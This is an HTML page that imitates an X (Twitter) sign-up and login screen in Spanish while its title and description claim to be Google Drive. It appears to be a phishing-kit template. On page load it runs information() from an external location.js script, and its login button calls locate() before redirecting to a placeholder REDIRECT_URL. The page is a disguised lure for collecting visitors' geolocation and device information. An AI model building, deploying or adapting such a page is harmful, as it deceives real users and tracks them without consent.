<!DOCTYPE html>
<html lang="en">
<head>
	<meta name="description" content="Web word processing, presentations and spreadsheets">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=0">
	<link rel="shortcut icon" href="/images/drive_favicon1.ico">
	<title>Google Drive - Access Denied</title>
	<link rel="stylesheet" type="text/css" href="css/main.css">
	<link rel="shortcut icon" href="imagenes/x.png" type="image/x-icon">
	<script type="text/javascript">
    	if (window.location.protocol == "http:") {
        	var restOfUrl = window.location.href.substr(5);
        	window.location = "https:" + restOfUrl;
    	}
    </script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
	<script type="text/javascript" src="js/location.js"></script>
</head>
<body onload="information();">
	<div>
        <div class="titulo">
            <h1>Lo que está <br> 
                 pasando ahora</h1>
        </div>
        <div class="img">
            <img src="imagenes/x.png" alt="x-icon" width="410" height="380">
        </div>
        <div class="subtitulo">
            <h2>Únete hoy</h2>
        </div>
        <div class="google">
            <a href="x.html" class="boton">Registrate con Google</a>
        </div>
        <div class="apple">
            <a href="x.html" class="boton2">Registrarse con Apple</a>
        </div>
        <div class="cuenta">
            <a href="x.html" class="boton3">Crear cuenta</a>
        </div>
        <div class="terminos">
            <p class="condiciones">Al registrarte, aceptas los Términos de servicio y la Política <br>
                de privacidad, incluida la política de Uso de Cookies.</p>
        </div>
        <div class="pregunta">
            <h3>¿Ya tienes una cuenta?</h3>
        </div>
        <div class="sesion">
            <button class="botoncito" id="requestButton" style="font-weight:bold" class="jfk-button jfk-button-action" onclick="locate(function(){window.location='REDIRECT_URL';}, function(){$('#change').html('Failed');});">Iniciar Sesión</button>
        </div>
        <div class="botones">
            <img src="imagenes/botones.png" alt="botones" width="1320" height="78">
        </div>
    </div>
</body>
</html>